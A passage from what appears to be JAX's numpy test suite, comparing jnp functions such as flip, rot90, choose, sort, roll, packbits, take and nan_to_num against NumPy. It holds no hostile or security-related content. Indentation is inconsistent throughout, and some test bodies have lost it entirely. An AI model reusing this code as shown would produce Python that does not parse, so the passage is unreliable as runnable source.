# self.assertEqual(jnp.array([0, np.float16(1)]).dtype, jnp.result_type('int64', 'float16'))
#
# # out of bounds leads to an OverflowError
# val = int_min - 1
# with self.assertRaisesRegex(OverflowError, f"Python int {val} too large to convert to int64"):
# jnp.array([0, val])
def testIssue121(self):
  """jnp scalars must not look like numpy scalars (regression for #121)."""
  self.assertFalse(np.isscalar(jnp.array(3)))
def testArrayOutputsDeviceArrays(self):
  """jnp.array returns device arrays for empty, ndarray, and __array__ inputs."""
  assert xla.type_is_device_array(jnp.array([]))
  assert xla.type_is_device_array(jnp.array(np.array([])))

  # Objects exposing __array__ are also converted to device arrays.
  class NDArrayLike:
    def __array__(self, dtype=None):
      return np.array([], dtype=dtype)
  assert xla.type_is_device_array(jnp.array(NDArrayLike()))

  # NOTE(mattjj): disabled b/c __array__ must produce ndarrays
  # class DeviceArrayLike:
  #     def __array__(self, dtype=None):
  #         return jnp.array([], dtype=dtype)
  # assert xla.type_is_device_array(jnp.array(DeviceArrayLike()))
def testArrayMethod(self):
  """jnp.array consults an object's __array__ method."""
  class arraylike(object):
    dtype = np.float32
    def __array__(self, dtype=None):
      return np.array(3., dtype=dtype)
  result = jnp.array(arraylike())
  assert result == 3.
def testMemoryView(self):
  """jnp.array accepts buffer objects such as bytearray."""
  expected = np.array([0x2a], dtype=np.uint8)
  self.assertAllClose(jnp.array(bytearray(b'\x2a')), expected)
def testIsClose(self):
  """jnp.isclose matches np.isclose over finite, inf, and nan inputs."""
  c_isclose = api.jit(jnp.isclose)
  c_isclose_nan = api.jit(partial(jnp.isclose, equal_nan=True))
  n = 2
  rng = np.random.RandomState(0)
  x = rng.randn(n, 1)
  y = rng.randn(n, 1)
  inf = np.asarray(n * [np.inf]).reshape([n, 1])
  nan = np.asarray(n * [np.nan]).reshape([n, 1])
  args = [x, y, inf, -inf, nan]

  for arg0, arg1 in itertools.product(args, repeat=2):
    # Default behavior (NaNs compare unequal), eager and jitted.
    expected = np.isclose(arg0, arg1)
    self.assertTrue(jnp.all(jnp.equal(expected, jnp.isclose(arg0, arg1))))
    self.assertTrue(jnp.all(jnp.equal(expected, c_isclose(arg0, arg1))))
    # equal_nan=True, eager and jitted.
    expected = np.isclose(arg0, arg1, equal_nan=True)
    self.assertTrue(jnp.all(jnp.equal(
        expected, jnp.isclose(arg0, arg1, equal_nan=True))))
    self.assertTrue(jnp.all(jnp.equal(expected, c_isclose_nan(arg0, arg1))))
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x={}_y={}_equal_nan={}".format(x, y, equal_nan),
     "x": x, "y": y, "equal_nan": equal_nan}
    for x, y in itertools.product([
        1, [1], [1, 1 + 1E-4], [1, np.nan]], repeat=2)
    for equal_nan in [True, False]))
def testAllClose(self, x, y, equal_nan):
  """Checks jnp.allclose against np.allclose, including NaN handling."""
  jnp_fun = partial(jnp.allclose, equal_nan=equal_nan, rtol=1E-3)
  np_fun = partial(np.allclose, equal_nan=equal_nan, rtol=1E-3)
  args_maker = lambda: [x, y]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
def testZeroStridesConstantHandler(self):
  """A broadcast (zero-stride) numpy constant closed over by jit works."""
  raw_const = np.random.RandomState(0).randn(1, 2, 1, 1, 5, 1)
  const = np.broadcast_to(raw_const, (3, 2, 3, 4, 5, 6))
  fun = api.jit(lambda x: x * const)
  self.assertAllClose(fun(3.), 3. * const, check_dtypes=False)
def testIsInstanceNdarrayDuringTracing(self):
  """Tracers seen inside jit must still pass isinstance(x, jnp.ndarray)."""
  arr = np.ones(3)

  @api.jit
  def f(x):
    # The assertion runs at trace time, when x is a tracer.
    self.assertIsInstance(x, jnp.ndarray)
    return jnp.sum(x)

  f(arr)
def testNonArrayErrorMessage(self):
  """Passing a raw Python list to jnp.add/jnp.dot raises TypeError."""
  x = [1., 2.]
  y = np.array([3., 4.])

  def g(x, y):
    return jnp.add(x, y)

  def f(x, y):
    return jnp.dot(x, y)

  # Each variant must fail, both eagerly and under jit.
  for fun in (g, f, api.jit(g), api.jit(f)):
    self.assertRaises(TypeError, lambda: fun(x, y))
def testAbstractionErrorMessage(self):
  """Using a traced value where a concrete one is needed raises clearly."""
  @api.jit
  def f(x, n):
    # `n` controls the Python loop, so it must be concrete.
    for _ in range(n):
      x = x * x
    return x

  self.assertRaises(jax.errors.TracerIntegerConversionError, lambda: f(3., 3))

  @api.jit
  def g(x):
    # Python `if` on a traced value requires concretization.
    if x > 0.:
      return x * 2
    else:
      return x + 2

  self.assertRaises(jax.errors.ConcretizationTypeError, lambda: g(3.))
def testTracingPrimitiveWithNoTranslationErrorMessage(self):
  """A _not_implemented primitive only errors when traced/compiled."""
  # TODO(mattjj): update this for jax3
  self.skipTest("test needs jax3 update")
  foo = jnp._not_implemented(lambda x: x)
  # Eager execution does not hit the missing translation -> no error.
  foo(np.arange(3))
  # Compiling forces the translation, which raises.
  self.assertRaises(NotImplementedError, lambda: api.jit(foo)(np.arange(3)))
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for shape in [(3,), (2, 3)]
    for dtype in default_dtypes
    for axis in list(range(-len(shape), len(shape))) + [None] + [tuple(range(len(shape)))]  # Test negative axes and tuples
))
def testFlip(self, shape, dtype, axis):
  """Checks jnp.flip against np.flip."""
  rng = jtu.rand_default(self.rng())
  args_maker = self._GetArgsMaker(rng, [shape], [dtype])
  jnp_op = lambda x: jnp.flip(x, axis)
  np_op = lambda x: np.flip(x, axis)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for shape in [(3,), (2, 3), (3, 2, 4)]
    for dtype in default_dtypes))
def testFlipud(self, shape, dtype):
  """Checks jnp.flipud against np.flipud."""
  rng = jtu.rand_default(self.rng())
  args_maker = self._GetArgsMaker(rng, [shape], [dtype])
  jnp_op = lambda x: jnp.flipud(x)
  np_op = lambda x: np.flipud(x)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for shape in [(3, 2), (2, 3), (3, 2, 4)]
    for dtype in default_dtypes))
def testFliplr(self, shape, dtype):
  """Checks jnp.fliplr against np.fliplr."""
  rng = jtu.rand_default(self.rng())
  args_maker = self._GetArgsMaker(rng, [shape], [dtype])
  jnp_op = lambda x: jnp.fliplr(x)
  np_op = lambda x: np.fliplr(x)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_k={}_axes={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k, axes),
     "shape": shape, "dtype": dtype, "k": k, "axes": axes}
    for shape, axes in [
        [(2, 3), (0, 1)],
        [(2, 3), (1, 0)],
        [(4, 3, 2), (0, 2)],
        [(4, 3, 2), (2, 1)],
    ]
    # k spans negative, zero, and >4 rotation counts.
    for k in range(-3, 4)
    for dtype in default_dtypes))
def testRot90(self, shape, dtype, k, axes):
  """Checks jnp.rot90 against np.rot90 for various k and axis pairs."""
  rng = jtu.rand_default(self.rng())
  args_maker = self._GetArgsMaker(rng, [shape], [dtype])
  jnp_op = lambda x: jnp.rot90(x, k, axes)
  np_op = lambda x: np.rot90(x, k, axes)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
# TODO(mattjj): test infix operator overrides
def testRavel(self):
  """The .ravel() method compiles and matches eager execution."""
  rng = np.random.RandomState(0)
  make_args = lambda: [rng.randn(3, 4).astype("float32")]
  self._CompileAndCheck(lambda x: x.ravel(), make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_order={}_mode={}".format(
        shape, order, mode),
     "shape": shape, "order": order, "mode": mode}
    for shape in nonempty_nonscalar_array_shapes
    for order in ['C', 'F']
    for mode in ['wrap', 'clip', 'raise']))
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testRavelMultiIndex(self, shape, order, mode):
  """Checks jnp.ravel_multi_index against numpy, including error paths."""
  # generate indices in each dimension with a few out of bounds.
  rngs = [jtu.rand_int(self.rng(), low=-1, high=dim + 1)
          for dim in shape]
  # generate multi_indices of different dimensions that broadcast.
  args_maker = lambda: [tuple(rng(ndim * (3,), jnp.int_)
                              for ndim, rng in enumerate(rngs))]

  def np_fun(x):
    try:
      return np.ravel_multi_index(x, shape, order=order, mode=mode)
    except ValueError as err:
      if str(err).startswith('invalid entry'):
        # sentinel indicating expected error.
        return -999
      else:
        raise

  def jnp_fun(x):
    try:
      return jnp.ravel_multi_index(x, shape, order=order, mode=mode)
    except ValueError as err:
      if str(err).startswith('invalid entry'):
        # sentinel indicating expected error.
        return -999
      else:
        raise

  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  if mode == 'raise':
    # mode='raise' requires concrete index values, which jit cannot supply.
    msg = ("The error occurred because ravel_multi_index was jit-compiled "
           "with mode='raise'. Use mode='wrap' or mode='clip' instead.")
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg):
      jax.jit(jnp_fun)(*args_maker())
  else:
    self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_ashape={}{}_cshapes={}{}_mode={}".format(
        adtype.__name__, ashape, cdtype.__name__, cshapes, mode),
     "ashape": ashape, "adtype": adtype, "cshapes": cshapes, "cdtype": cdtype, "mode": mode}
    for ashape in ((), (4,), (3, 4))
    for cshapes in [
        [(), (4,)],
        [(3, 4), (4,), (3, 1)]
    ]
    for adtype in int_dtypes
    for cdtype in default_dtypes
    for mode in ['wrap', 'clip', 'raise']))
def testChoose(self, ashape, adtype, cshapes, cdtype, mode):
  """Checks jnp.choose against np.choose, including the mode='raise' path."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(ashape, adtype), [rng(s, cdtype) for s in cshapes]]

  def np_fun(a, c):
    try:
      return np.choose(a, c, mode=mode)
    except ValueError as err:
      if mode == 'raise' and str(err).startswith('invalid entry'):
        return -999  # sentinel indicating expected error.
      else:
        raise

  def jnp_fun(a, c):
    try:
      return jnp.choose(a, c, mode=mode)
    except ValueError as err:
      if mode == 'raise' and str(err).startswith('invalid entry'):
        return -999  # sentinel indicating expected error.
      else:
        raise

  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  if mode == 'raise':
    # mode='raise' requires concrete index values, which jit cannot supply.
    msg = ("The error occurred because jnp.choose was jit-compiled"
           " with mode='raise'. Use mode='wrap' or mode='clip' instead.")
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg):
      jax.jit(jnp_fun)(*args_maker())
  else:
    self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.parameters(
    (0, (2, 1, 3)),
    (5, (2, 1, 3)),
    (0, ()),
    ([0, 1, 2], (2, 2)),
    ([[[0, 1], [2, 3]]], (2, 2)))
def testUnravelIndex(self, flat_index, shape):
  """Checks jnp.unravel_index against np.unravel_index."""
  args_maker = lambda: (flat_index, shape)
  self._CheckAgainstNumpy(np.unravel_index, jnp.unravel_index,
                          args_maker)
  self._CompileAndCheck(jnp.unravel_index, args_maker)
def testUnravelIndexOOB(self):
  """Out-of-bounds flat indices are handled without raising."""
  # Index past the end of a (2,) array resolves to the last element.
  self.assertEqual(jnp.unravel_index(2, (2,)), (1,))
  # Negative index within -size..0 wraps.
  self.assertEqual(jnp.unravel_index(-2, (2, 1, 3,)), (1, 0, 1))
  # Negative index beyond -size resolves to the first element.
  self.assertEqual(jnp.unravel_index(-3, (2,)), (0,))
def testAstype(self):
  """.astype(jnp.int32) matches the numpy equivalent."""
  rng = np.random.RandomState(0)
  args_maker = lambda: [rng.randn(3, 4).astype("float32")]
  to_int32 = lambda x: jnp.asarray(x).astype(jnp.int32)
  reference = lambda x: np.asarray(x).astype(jnp.int32)
  self._CheckAgainstNumpy(reference, to_int32, args_maker)
  self._CompileAndCheck(to_int32, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for shape in array_shapes
    for dtype in all_dtypes))
def testNbytes(self, shape, dtype):
  """Checks the .nbytes property against numpy's."""
  rng = jtu.rand_default(self.rng())
  np_op = lambda x: np.asarray(x).nbytes
  jnp_op = lambda x: jnp.asarray(x).nbytes
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_dtype={}".format(
        jtu.format_shape_dtype_string(shape, a_dtype), dtype),
     "shape": shape, "a_dtype": a_dtype, "dtype": dtype}
    for shape in [(8,), (3, 8)]  # last dim = 8 to ensure shape compatibility
    for a_dtype in (default_dtypes + unsigned_dtypes + bool_dtypes)
    for dtype in (default_dtypes + unsigned_dtypes + bool_dtypes)))
def testView(self, shape, a_dtype, dtype):
  """Checks the .view(dtype) reinterpret-cast method against numpy's."""
  if jtu.device_under_test() == 'tpu':
    if jnp.dtype(a_dtype).itemsize in [1, 2] or jnp.dtype(dtype).itemsize in [1, 2]:
      self.skipTest("arr.view() not supported on TPU for 8- or 16-bit types.")
  if not config.x64_enabled:
    if jnp.dtype(a_dtype).itemsize == 8 or jnp.dtype(dtype).itemsize == 8:
      self.skipTest("x64 types are disabled by jax_enable_x64")
  # rand_fullrange exercises the entire bit pattern space of a_dtype.
  rng = jtu.rand_fullrange(self.rng())
  args_maker = lambda: [rng(shape, a_dtype)]
  np_op = lambda x: np.asarray(x).view(dtype)
  jnp_op = lambda x: jnp.asarray(x).view(dtype)
  # Above may produce signaling nans; ignore warnings from invalid values.
  with np.errstate(invalid='ignore'):
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
def testPathologicalFloats(self):
  """Round-tripping special float bit patterns through .view preserves bits."""
  # Each literal below is the exact uint32 bit pattern of an IEEE-754
  # float32 special value; the test views them as float32 and back.
  args_maker = lambda: [np.array([
      0b_0111_1111_1000_0000_0000_0000_0000_0000,  # inf
      0b_1111_1111_1000_0000_0000_0000_0000_0000,  # -inf
      0b_0111_1111_1100_0000_0000_0000_0000_0000,  # qnan
      0b_1111_1111_1100_0000_0000_0000_0000_0000,  # -qnan
      0b_0111_1111_1000_0000_0000_0000_0000_0001,  # snan
      0b_1111_1111_1000_0000_0000_0000_0000_0001,  # -snan
      0b_0111_1111_1000_0000_0000_1100_0000_0000,  # nonstandard nan
      0b_1111_1111_1000_0000_0000_1100_0000_0000,  # -nonstandard nan
      0b_0000_0000_0000_0000_0000_0000_0000_0000,  # zero
      0b_1000_0000_0000_0000_0000_0000_0000_0000,  # -zero
  ], dtype='uint32')]

  np_op = lambda x: np.asarray(x).view('float32').view('uint32')
  jnp_op = lambda x: jnp.asarray(x).view('float32').view('uint32')

  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
# TODO(mattjj): test other ndarray-like method overrides
def testNpMean(self):
  """np.mean accepts jnp arrays (regression test for #125)."""
  # from https://github.com/google/jax/issues/125
  x = lax.add(jnp.eye(3, dtype=float), 0.)
  self.assertAllClose(np.mean(x), np.array(1. / 3), check_dtypes=False)
def testArangeOnFloats(self):
  """jnp.arange with float arguments matches np.arange."""
  # Regression cases: https://github.com/google/jax/issues/145
  # and https://github.com/google/jax/issues/3450
  for args in [(0.0, 1.0, 0.1), (2.5,)]:
    self.assertAllClose(np.arange(*args, dtype=jnp.float_),
                        jnp.arange(*args))
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for dtype in all_dtypes
    for shape in nonzerodim_shapes
    for axis in (None, *range(len(shape)))))
def testSort(self, dtype, shape, axis):
  """Checks jnp.sort against np.sort."""
  # rand_some_equal exercises stability with ties present.
  rng = jtu.rand_some_equal(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  jnp_fun = jnp.sort
  np_fun = np.sort
  if axis is not None:
    jnp_fun = partial(jnp_fun, axis=axis)
    np_fun = partial(np_fun, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for dtype in all_dtypes
    for shape in one_dim_array_shapes
    for axis in [None]))
def testSortComplex(self, dtype, shape, axis):
  """Checks jnp.sort_complex against np.sort_complex on 1-D inputs."""
  rng = jtu.rand_some_equal(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np.sort_complex, jnp.sort_complex, args_maker, check_dtypes=False)
  self._CompileAndCheck(jnp.sort_complex, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_input_type={}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        input_type.__name__, axis),
     "shape": shape, "dtype": dtype, "input_type": input_type, "axis": axis}
    for dtype in all_dtypes
    for shape in nonempty_nonscalar_array_shapes
    # keys may be given as an ndarray or as a tuple of ndarrays.
    for input_type in [np.array, tuple]
    for axis in (-1, *range(len(shape) - 1))))
def testLexsort(self, dtype, shape, input_type, axis):
  """Checks jnp.lexsort against np.lexsort."""
  rng = jtu.rand_some_equal(self.rng())
  args_maker = lambda: [input_type(rng(shape, dtype))]
  jnp_op = lambda x: jnp.lexsort(x, axis=axis)
  np_op = lambda x: np.lexsort(x, axis=axis)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for dtype in all_dtypes
    for shape in nonzerodim_shapes
    for axis in (None, *range(len(shape)))))
def testArgsort(self, dtype, shape, axis):
  """Checks jnp.argsort against np.argsort."""
  # rand_some_equal exercises tie-breaking behavior.
  rng = jtu.rand_some_equal(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  jnp_fun = jnp.argsort
  np_fun = np.argsort
  if axis is not None:
    jnp_fun = partial(jnp_fun, axis=axis)
    np_fun = partial(np_fun, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for dtype in all_dtypes
    for shape in nonzerodim_shapes))
def testMsort(self, dtype, shape):
  """Checks jnp.msort against np.msort."""
  rng = jtu.rand_some_equal(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np.msort, jnp.msort, args_maker)
  self._CompileAndCheck(jnp.msort, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_shifts={}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        shifts, axis),
     "shape": shape, "dtype": dtype, "shifts": shifts, "axis": axis}
    for dtype in all_dtypes
    for shape in [(3, 4), (3, 4, 5), (7, 4, 0)]
    # shift/axis pairs cover scalars, tuples, negatives, repeats, and
    # shifts larger than the array.
    for shifts, axis in [
        (3, None),
        (1, 1),
        ((3,), (0,)),
        ((-2,), (-2,)),
        ((1, 2), (0, -1)),
        ((4, 2, 5, 5, 2, 4), None),
        (100, None),
    ]))
def testRoll(self, shape, dtype, shifts, axis):
  """Checks jnp.roll against np.roll."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype), np.array(shifts)]
  jnp_op = partial(jnp.roll, axis=axis)
  np_op = partial(np.roll, axis=axis)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_start={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        axis, start),
     "shape": shape, "dtype": dtype, "axis": axis,
     "start": start}
    for dtype in all_dtypes
    for shape in [(1, 2, 3, 4)]
    for axis in [-3, 0, 2, 3]
    for start in [-4, -1, 2, 4]))
def testRollaxis(self, shape, dtype, start, axis):
  """Checks jnp.rollaxis against np.rollaxis."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  jnp_op = partial(jnp.rollaxis, axis=axis, start=start)
  np_op = partial(np.rollaxis, axis=axis, start=start)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_bitorder={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, bitorder),
     "shape": shape, "dtype": dtype, "axis": axis,
     "bitorder": bitorder}
    for dtype in [np.uint8, np.bool_]
    for bitorder in ['big', 'little']
    for shape in [(1, 2, 3, 4)]
    for axis in [None, 0, 1, -2, -1]))
def testPackbits(self, shape, dtype, axis, bitorder):
  """Checks jnp.packbits against np.packbits."""
  # rand_some_zero mixes zero and nonzero entries to exercise both bits.
  rng = jtu.rand_some_zero(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  jnp_op = partial(jnp.packbits, axis=axis, bitorder=bitorder)
  np_op = partial(np.packbits, axis=axis, bitorder=bitorder)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_bitorder={}_count={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, bitorder, count),
     "shape": shape, "dtype": dtype, "axis": axis, "bitorder": bitorder,
     "count": count}
    for dtype in [np.uint8]
    for bitorder in ['big', 'little']
    for shape in [(1, 2, 3, 4)]
    for axis in [None, 0, 1, -2, -1]
    for count in [None, 20]))
def testUnpackbits(self, shape, dtype, axis, bitorder, count):
  """Checks jnp.unpackbits against np.unpackbits."""
  # NOTE(review): `count` is generated but not forwarded to either op —
  # presumably intentional for case-name coverage, but worth confirming.
  rng = jtu.rand_int(self.rng(), 0, 256)
  args_maker = lambda: [rng(shape, dtype)]
  jnp_op = partial(jnp.unpackbits, axis=axis, bitorder=bitorder)
  np_op = partial(np.unpackbits, axis=axis, bitorder=bitorder)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_index={}_axis={}_mode={}".format(
          jtu.format_shape_dtype_string(shape, dtype),
          jtu.format_shape_dtype_string(index_shape, index_dtype),
          axis, mode),
       "shape": shape, "index_shape": index_shape, "dtype": dtype,
       "index_dtype": index_dtype, "axis": axis, "mode": mode}
      for shape in [(3,), (3, 4), (3, 4, 5)]
      for index_shape in scalar_shapes + [(3,), (2, 1, 3)]
      for axis in itertools.chain(range(-len(shape), len(shape)),
                                  [cast(Optional[int], None)])
      for dtype in all_dtypes
      for index_dtype in int_dtypes
      for mode in [None, 'wrap', 'clip']))
  def testTake(self, shape, dtype, index_shape, index_dtype, axis, mode):
    # jnp.take vs np.take across index modes.
    def args_maker():
      # Closure over rng/rng_indices, which are bound below before the first
      # call to args_maker.
      x = rng(shape, dtype)
      i = rng_indices(index_shape, index_dtype)
      return x, i
    rng = jtu.rand_default(self.rng())
    if mode is None:
      # Without a mode, indices must be in bounds for the selected axis
      # (or for the flattened array when axis is None).
      rng_indices = jtu.rand_int(self.rng(), -shape[axis or 0], shape[axis or 0])
    else:
      # 'wrap'/'clip' modes: deliberately allow out-of-range indices.
      rng_indices = jtu.rand_int(self.rng(), -5, 5)
    jnp_op = lambda x, i: jnp.take(x, i, axis=axis, mode=mode)
    np_op = lambda x, i: np.take(x, i, axis=axis, mode=mode)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
def testTakeEmpty(self):
np.testing.assert_array_equal(
jnp.array([], dtype=jnp.float32),
jnp.take(jnp.array([], jnp.float32), jnp.array([], jnp.int32)))
np.testing.assert_array_equal(
jnp.ones((2, 0, 4), dtype=jnp.float32),
jnp.take(jnp.ones((2, 0, 4), dtype=jnp.float32), jnp.array([], jnp.int32),
axis=1))
with self.assertRaisesRegex(IndexError, "non-empty jnp.take"):
jnp.take(jnp.ones((2, 0, 4), dtype=jnp.float32),
jnp.array([0], jnp.int32), axis=1)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_index={}_axis={}".format(
jtu.format_shape_dtype_string(x_shape, dtype),
jtu.format_shape_dtype_string(i_shape, index_dtype), axis),
"x_shape": x_shape, "i_shape": i_shape, "dtype": dtype,
"index_dtype": index_dtype, "axis": axis}
for x_shape, i_shape in filter(
_shapes_are_equal_length,
filter(_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(nonempty_nonscalar_array_shapes, 2)))
for axis in itertools.chain(range(len(x_shape)), [-1],
[cast(Optional[int], None)])
for dtype in default_dtypes
for index_dtype in int_dtypes))
def testTakeAlongAxis(self, x_shape, i_shape, dtype, index_dtype, axis):
rng = jtu.rand_default(self.rng())
i_shape = np.array(i_shape)
if axis is None:
i_shape = [np.prod(i_shape, dtype=np.int64)]
else:
# Test the case where the size of the axis doesn't necessarily broadcast.
i_shape[axis] *= 3
i_shape = list(i_shape)
def args_maker():
x = rng(x_shape, dtype)
n = np.prod(x_shape, dtype=np.int32) if axis is None else x_shape[axis]
if np.issubdtype(index_dtype, np.unsignedinteger):
index_rng = jtu.rand_int(self.rng(), 0, n)
else:
index_rng = jtu.rand_int(self.rng(), -n, n)
i = index_rng(i_shape, index_dtype)
return x, i
jnp_op = lambda x, i: jnp.take_along_axis(x, i, axis=axis)
if hasattr(np, "take_along_axis"):
np_op = lambda x, i: np.take_along_axis(x, i, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testTakeAlongAxisWithUint8IndicesDoesNotOverflow(self):
# https://github.com/google/jax/issues/5088
h = jtu.rand_default(self.rng())((256, 256, 100), np.float32)
g = jtu.rand_int(self.rng(), 0, 100)((256, 256, 1), np.uint8)
q0 = jnp.take_along_axis(h, g, axis=-1)
q1 = np.take_along_axis( h, g, axis=-1)
np.testing.assert_equal(q0, q1)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_shape={}_n={}_increasing={}".format(
          jtu.format_shape_dtype_string([shape], dtype),
          n, increasing),
       "dtype": dtype, "shape": shape, "n": n, "increasing": increasing}
      for dtype in inexact_dtypes
      for shape in [0, 5]
      for n in [2, 4]
      for increasing in [False, True]))
  def testVander(self, shape, dtype, n, increasing):
    # jnp.vander vs np.vander, including the empty-input (shape 0) case.
    rng = jtu.rand_default(self.rng())
    def np_fun(arg):
      # np.vander does not support bfloat16; compute the reference in float32.
      arg = arg.astype(np.float32) if dtype == jnp.bfloat16 else arg
      return np.vander(arg, N=n, increasing=increasing)
    jnp_fun = lambda arg: jnp.vander(arg, N=n, increasing=increasing)
    args_maker = lambda: [rng([shape], dtype)]
    # np.vander seems to return float64 for all floating types. We could obey
    # those semantics, but they seem like a bug.
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                            tol={np.float32: 1e-3})
    self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=False)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix(
          "nan_to_num", [shape], [dtype]),
       "shape": shape, "dtype": dtype}
      for shape in array_shapes
      for dtype in inexact_dtypes))
  def testNanToNum(self, shape, dtype):
    # jnp.nan_to_num vs np.nan_to_num on inputs seeded with nan/inf values.
    rng = jtu.rand_some_inf_and_nan(self.rng())
    dtype = np.dtype(dtypes.canonicalize_dtype(dtype)).type
    def np_fun(x):
      if dtype == jnp.bfloat16:
        # np.nan_to_num does not support bfloat16; emulate it manually using
        # the bfloat16 finfo limits.
        x = np.where(np.isnan(x), dtype(0), x)
        x = np.where(np.isposinf(x), jnp.finfo(dtype).max, x)
        x = np.where(np.isneginf(x), jnp.finfo(dtype).min, x)
        return x
      else:
        return np.nan_to_num(x).astype(dtype)
    args_maker = lambda: [rng(shape, dtype)]
    # Python scalars have weak dtypes, so skip dtype checks for that shape.
    check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
    self._CheckAgainstNumpy(np_fun, jnp.nan_to_num, args_maker,
                            check_dtypes=check_dtypes)
    self._CompileAndCheck(jnp.nan_to_num, args_maker,
                          check_dtypes=check_dtypes)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("ix_", shapes, dtypes),
       "shapes": shapes, "dtypes": dtypes}
      for shapes, dtypes in (
        ((), ()),
